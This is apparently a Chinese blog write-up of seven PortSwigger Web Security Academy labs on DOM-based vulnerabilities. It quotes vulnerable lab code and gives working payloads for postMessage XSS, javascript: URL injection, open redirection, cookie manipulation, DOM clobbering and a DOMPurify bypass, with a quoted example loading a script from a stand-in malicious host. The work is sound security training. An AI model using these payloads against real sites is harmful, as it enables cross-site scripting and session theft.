Portswigger web security academy:DOM-based vulnerabilities
DOM-based vulnerabilities
材料里没列完,直接做题吧
1 - DOM XSS using web messages
题目描述
- 这个lab有一个简单的web-message漏洞
要求
- 利用exploit server给网站发送一个信息,使其执行
alert(document.cookie)
- 利用exploit server给网站发送一个信息,使其执行
解题过程
查看源码,发现如下代码
window.addEventListener('message', function(e) {
document.getElementById('ads').innerHTML = e.data;
})
去MDN看了下web message,是一个跨源通信的函数,可以通过
iframe来实现这个功能构造exp
- 先尝试了用
iframe+script标签的形式,但是发现script标签不会等iframe加载完,所以放进了iframe中 postMessage()的第二个参数使用通配符,允许目标站点为任意域(防止CORS被阻止)- 关于post进去的数据也进行了尝试(chrome),
svg,script都不行,想了一下应该与标签的解析流有关(插入的标签没有被解析),这里用img
<iframe src="https://ac131fb91f0c536f80f50dc100070028.web-security-academy.net/" onload='this.contentWindow.postMessage("<img src=x onerror=alert(document.cookie)>","*")'>
- 先尝试了用
2 - DOM XSS using web messages and a JavaScript URL
题目描述
- 此lab存在DOM-based跳转漏洞(通过web message诱发)
要求
- 构造页面,使访问者执行
alert(document.cookie)
- 构造页面,使访问者执行
解题过程
还是先找代码
window.addEventListener('message', function(e) {
var url = e.data;
if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) { //传入的url包含http(s):
location.href = url;// 跳转
}
}, false);
弹窗可以通过伪
javascript伪协议调用let url = 'javscript:alert()-"http:"';
location.href = url; // 但是这样不好写进去,因为单双引号(所以需要借助编码环境进行编码,事件内部是js解析环境,会先进行unicode解码,所以可以进行编码
this.contentWindow.postMessage('javascript:alert(document.cookie)-"http:"',"*")
构造exp
<iframe src="https://ac901fa21ee08d748031385e00110021.web-security-academy.net/" onload='this.contentWindow.postMessage('javascript:alert(document.cookie)-"http:"',"*")'>
3 - DOM XSS using web messages and JSON.parse
题目描述
- 此lab使用了
web messageing并把消息当作json解析
- 此lab使用了
要求
- 构造页面,使访问者执行
alert(document.cookie)
- 构造页面,使访问者执行
解题过程
先看代码
window.addEventListener('message', function(e) {
var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
document.body.appendChild(iframe);
try {
d = JSON.parse(e.data);
} catch(e) {
return;
}
switch(d.type) {
case "page-load":
ACMEplayer.element.scrollIntoView();
break;
case "load-channel":
ACMEplayer.element.src = d.url; // 如果d.type=="load-channel",则讲url赋给iframe
break;
case "player-height-changed":
ACMEplayer.element.style.width = d.width + "px";
ACMEplayer.element.style.height = d.height + "px";
break;
}
}, false);
构造exp
<iframe src="https://ac0b1f8a1e418d0a802e3c2100ea005f.web-security-academy.net/" onload='var a={"type":"load-channel","url":"javascript:alert(document.cookie)"};this.contentWindow.postMessage(JSON.stringify(a),"*")'>
- 这里需要用
JSON.stringify()把json转换成字符串,不能直接传输对象
- 这里需要用
4 - DOM-based open redirection
题目描述
- 此lab有一个DOM型的url跳转漏洞
要求
- 把受害者拐进exploit server
解题过程
点进一个详情页面,发现返回链接比较特殊
<a href="#" onclick="returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1];else location.href = '/';">Back to Blog</a>
- 把
location(地址栏里全部的东西,包括#后面的内容)用正则url=(https?:\/\/.+)匹配,如果能匹配到,就跳转到匹配到的url
- 把
构造exp
- 这块想了半天,把受害者拐进exploit server需要点击按钮,总不能继续xss吧,然后去看了solution,自己就是受害者???
- 第二个,使用
#也可以达到目的,但是不给过,只能用&(猜测后端通过检测url参数判断)
https://ac891f911e4e7dcb80201fd4009d0060.web-security-academy.net/post?postId=4#url=https://acc61fdf1e577d2480831f0b019e002b.web-security-academy.net solution: # -> &
5 - DOM-based cookie manipulation
题目描述
- 此lab存在DOM型客户端cookie修改
要求
- 插入一个可以实现XSS(弹cookie)的cookie
解题过程
在商品详情页面看到如下代码
document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
可以通过
&/#插入内容在主页,发现在访问过之后,会出现浏览记录,而且会被
'逃逸<a href="https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#" -alert()-'="">'>Last viewed product</a> 之前访问的是https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#'-alert()-'>
构造exp
<iframe src="https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#'%3E%3Csvg/onload=alert(document.cookie)%3E" onload="this.src='https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/'">
6 - Exploiting DOM clobbering to enable XSS
题目描述
- 评论功能点允许安全的HTML
要求
- 构造HTML注入,污染(clobber)变量?,调用
alert() - hint:预期解只在chrome有效
- 构造HTML注入,污染(clobber)变量?,调用
解题过程
在详情页面看到函数调用
loadComments('/post/comment'),看看函数定义function loadComments(postCommentPath) {
let xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
let comments = JSON.parse(this.responseText);
displayComments(comments);
}
};
xhr.open("GET", postCommentPath + window.location.search);
xhr.send(); function escapeHTML(data) {
return data.replace(/[<>'"]/g, function(c){
return '&#' + c.charCodeAt(0) + ';';
})
} function displayComments(comments) {
let userComments = document.getElementById("user-comments"); for (let i = 0; i < comments.length; ++i)
{
comment = comments[i];
let commentSection = document.createElement("section");
commentSection.setAttribute("class", "comment"); let firstPElement = document.createElement("p"); let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">'; let divImgContainer = document.createElement("div");
divImgContainer.innerHTML = avatarImgHTML if (comment.author) {
if (comment.website) {
let websiteElement = document.createElement("a");
websiteElement.setAttribute("id", "author");
websiteElement.setAttribute("href", comment.website);
firstPElement.appendChild(websiteElement)
} let newInnerHtml = firstPElement.innerHTML + DOMPurify.sanitize(comment.author)
firstPElement.innerHTML = newInnerHtml
} if (comment.date) {
let dateObj = new Date(comment.date)
let month = '' + (dateObj.getMonth() + 1);
let day = '' + dateObj.getDate();
let year = dateObj.getFullYear(); if (month.length < 2)
month = '0' + month;
if (day.length < 2)
day = '0' + day; dateStr = [day, month, year].join('-'); let newInnerHtml = firstPElement.innerHTML + " | " + dateStr
firstPElement.innerHTML = newInnerHtml
} firstPElement.appendChild(divImgContainer); commentSection.appendChild(firstPElement); if (comment.body) {
let commentBodyPElement = document.createElement("p");
commentBodyPElement.innerHTML = DOMPurify.sanitize(comment.body); commentSection.appendChild(commentBodyPElement);
}
commentSection.appendChild(document.createElement("p")); userComments.appendChild(commentSection);
}
}
};
挨着看了一遍,感觉29、30行可能存在问题,但是不知道怎么利用
- 试了一下在提交参数的时候增加
avatar,没有用
- 试了一下在提交参数的时候增加
放着先测一下能用哪些标签
a
audio
b
big
br
button
canvas
center
cite
code
datalist
dfn
del
details
filedset
h1
hr
i
input
ins
kdb
label
li
mark
marquee
meter
optgroup
progress
q
rp
s
samp
select
svg
textarea
u
有点多,挑一个最喜欢的svg测测
然后发现,返回的数据包是没有过滤的,过滤全部在前端的
DOMPurify.sanitize()中进行本以为这条路走不通了,然后在搜这个函数的时候看到一篇Bypass DOMPurify的文章
<form>
<math><mtext>
</form><form>
<mglyph>
<style></math><img src onerror=alert(1)>
回到代码看看
如果能找到给
windows.属性赋值的方法(通过html或请求),就可以通过以下代码进行XSSlet defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';
去看了下材料DOM clobber 里面介绍了一种方法,
<script>
window.onload = function(){
let someObject = window.someObject || {};
let script = document.createElement('script');
script.src = someObject.url;
document.body.appendChild(script);
};
</script>
<!--
To exploit this vulnerable code, you could inject the following HTML to clobber the someObject reference with an anchor element:
As the two anchors use the same ID, the DOM groups them together in a DOM collection. The DOM clobbering vector then overwrites the someObject reference with this DOM collection. A name attribute is used on the last anchor element in order to clobber the url property of the someObject object, which points to an external script.
--> <!-- 要修改 window.someObject.url 则使id=someObject name=url href=目标内容 -->
<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>
测试发现
javascript:伪协议被过滤试试能不能逃逸出字符串,最后还是看了solution,用的
"("的html实体编码)
构造exp(调用
alert()函数就行了,加document.cookie会被过滤<a id=defaultAvatar><a id=defaultAvatar name=avatar href=""onerror=alert()//">
7 - Clobbering DOM attributes to bypass HTML filters
题目描述
- 此lab使用了
HTMLJanitor库,可以通过DOM clobber构造攻击向量bypass过滤器并调用alert(document.cookie)
- 此lab使用了
要求
- 给受害者发送一个自动执行的攻击向量,
alert(document.cookie) - intended solution for chrome
- 给受害者发送一个自动执行的攻击向量,
解题过程
进详情页面看了看代码,没有上一题的直接引用
window.object/document.object,此外,引用了HTMLJanitor库反复看了几遍
HTMLJanitor的代码,没找到突破口在哪里,于是去看了solution + Donx发现的DOM clobber的介绍<form id=x tabindex=0 onfocus=alert(document.cookie)><input id=attributes>
<!-- 覆盖 使 x.attributes == undefined --> <iframe src=https://your-lab-id.web-security-academy.net/post?postId=3 onload="setTimeout(someArgument=>this.src=this.src+'#x',500)">
关键代码
for (var a = 0; a < node.attributes.length; a += 1) {
var attr = node.attributes[a]; if (shouldRejectAttr(attr, allowedAttrs, node)) {
node.removeAttribute(attr.name);
// Shift the array to continue looping.
a = a - 1;
}
} // Sanitize children
this._sanitize(document, node); function shouldRejectAttr(attr, allowedAttrs, node) {
var attrName = attr.name.toLowerCase(); if (allowedAttrs === true) {
return false;
} else if (typeof allowedAttrs[attrName] === "function") {
return !allowedAttrs[attrName](attr.value, node);
} else if (typeof allowedAttrs[attrName] === "undefined") {
return true;
} else if (allowedAttrs[attrName] === false) {
return true;
} else if (typeof allowedAttrs[attrName] === "string") {
return allowedAttrs[attrName] !== attr.value;
} return false;
}
使用
<form id=x tabindex=0 onfocus=alert(document.cookie)><input id=attributes>进行DOM clobber,使得form.attributes == undefined在检测的代码中可以看到,当
node.attributes == undefined时,会绕过removeAttribute(),保留下标签中的事件
之后的
iframe标签是用来触发onfocus的,必须等到加载评论的ajax结束
Portswigger web security academy:DOM-based vulnerabilities的更多相关文章
- Portswigger web security academy:DOM Based XSS
Portswigger web security academy:DOM Based XSS 目录 Portswigger web security academy:DOM Based XSS DOM ...
- Portswigger web security academy:Clickjacking (UI redressing)
Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...
- Portswigger web security academy:WebSockets
Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...
- Portswigger web security academy:Stored XSS
Portswigger web security academy:Stored XSS 目录 Portswigger web security academy:Stored XSS Stored XS ...
- Portswigger web security academy:Cross-origin resource sharing (CORS)
Portswigger web security academy:Cross-origin resource sharing (CORS) 目录 Portswigger web security ac ...
- Portswigger web security academy:XML external entity (XXE) injection
Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...
- Portswigger web security academy:Cross-site request forgery (CSRF)
Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...
- Portswigger web security academy:OAth authentication vulnerable
Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...
- Portswigger web security academy:Server-side request forgery (SSRF)
Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...
- Portswigger web security academy:OS command injection
Portswigger web security academy:OS command injection 目录 Portswigger web security academy:OS command ...
随机推荐
- Gevent高并发网络库精解
进程 线程 协程 异步 并发编程(不是并行)目前有四种方式:多进程.多线程.协程和异步. 多进程编程在python中有类似C的os.fork,更高层封装的有multiprocessing标准库 多线程 ...
- Hibernate&MyBatis
ORM程序技术 概念:ORM是对象(Object).关系(Relational).映射(Mapping)的缩写. 作用:用于替代JDBC 用法:数据库类名与表名对应:字段名和属性名对应: 优势: 更方 ...
- 使用 Android Studio 的日志工具 Log
•Log简介 Android中的日志工具类是Log,这个类中提供了5个方法来供我们打印日志: 1. $Log.v()$ 用于打印那些最为琐碎的,意义最小的日志信息 对应级别 verbose,是 And ...
- Kubernetes 实战 —— 05. 服务:让客户端发现 pod 并与之通信(下)
将服务暴露给外部客户端 P136 有以下三种方式可以在外部访问服务: 将服务的类型设置成 NodePort 将服务的类型设置为 LoadBalance 创建一个 Ingress 资源 使用 NodeP ...
- 使用 Elastic 技术栈构建 Kubernetes全栈监控
以下我们描述如何使用 Elastic 技术栈来为 Kubernetes 构建监控环境.可观测性的目标是为生产环境提供运维工具来检测服务不可用的情况(比如服务宕机.错误或者响应变慢等),并且保留一些可以 ...
- [GDKOI2021] 普及组 Day1 总结
[ G D K O I 2021 ] 普 及 组 D a y 1 总 结 [GDKOI2021] 普及组 Day1 总结 [GDKOI2021]普及组Day1总结 长达3天的快乐GDKOI2021普及 ...
- 201871030106-陈鑫莲 实验二 个人项目-《D{0-1} KP 问题》项目报告
项目 内容 课程班级博客链接 班级博客 这个作业要求链接 作业要求 我的课程学习目标 1.掌握软件项目个人开发流程2.掌握Github发布软件项目的操作方法 这个作业在哪些方面帮助我实现学习目标 1. ...
- Mybatis的多表操作
1.Mybatis多表查询 1.1 一对一查询 1.1.1 一对一查询的模型MapperScannerConfigurer 用户表和订单表的关系为,一个用户有多个订单,一个订单只从属于一个用户 一对一 ...
- k8s在线和离线批量修改镜像地址的两种方式
背景介绍 有时往k8s集群里部署一堆服务的时候,需要拷贝一堆yaml文件,当然还有其他方式部署,例如通过建立一个一个的流水线等方式,但是这太慢了,虽然是一劳永逸,但是如果说仅仅是部署一次那就可太费劲了 ...
- day13.常用模块
一.time与datetime模块 1.1time 在Python中,通常有这几种方式来表示时间: 时间戳(timestamp):通常来说,时间戳表示的是从1970年1月1日00:00:00开始按秒计 ...